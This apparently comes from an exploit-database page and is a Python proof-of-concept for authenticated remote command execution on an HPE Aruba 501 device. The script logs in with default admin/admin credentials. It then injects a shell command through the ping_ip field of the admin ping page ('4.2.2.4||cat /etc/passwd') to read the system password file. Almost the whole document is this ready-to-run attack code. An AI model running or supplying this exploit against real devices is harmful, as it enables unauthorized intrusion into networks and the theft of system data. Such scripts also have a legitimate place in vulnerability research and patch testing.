Aurba 501 authenticated rce Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-08-24 | Type : webapps | Platform : linux


[+] Code ...

# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux

import requests
from requests.auth import HTTPBasicAuth


def get_input(prompt, default_value):
user_input = input(prompt)
return user_input if user_input else default_value


base_url = input("Enter the base URL: ")
if not base_url:
print("Base URL is required.")
exit(1)

username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")


login_url = f"{base_url}/login.cgi"
login_payload = {
"username": username,
"password": password,
"login": "Login"
}


login_headers = {
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Connection": "close"
}

session = requests.Session()


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)

# Check if login was successful
if response.status_code == 200 and "login failed" not in response.text.lower():
print("Login successful!")

# The command to be executed on the device
command = "cat /etc/passwd"


ping_ip = f"4.2.2.4||{command}"

# Data to be sent in the POST request
data = {
"ping_ip": ping_ip,
"ping_timeout": "1",
"textareai": "",
"ping_start": "Ping"
}

# Headers to be sent with the request
headers = {
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Referer": f"{base_url}/admin.cgi?action=ping",
"Connection": "close"
}

# Sending the HTTP POST request to exploit the vulnerability
exploit_url = f"{base_url}/admin.cgi?action=ping"
response = session.post(exploit_url, headers=headers, data=data, verify=False)


if any("root" in value for value in response.headers.values()):
print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
print(response.headers)
else:
print("Exploit failed. The response headers did not contain the expected output.")
else:
print("Login failed. Please check the credentials and try again.")

# Print the response headers for further analysis
print(response.headers)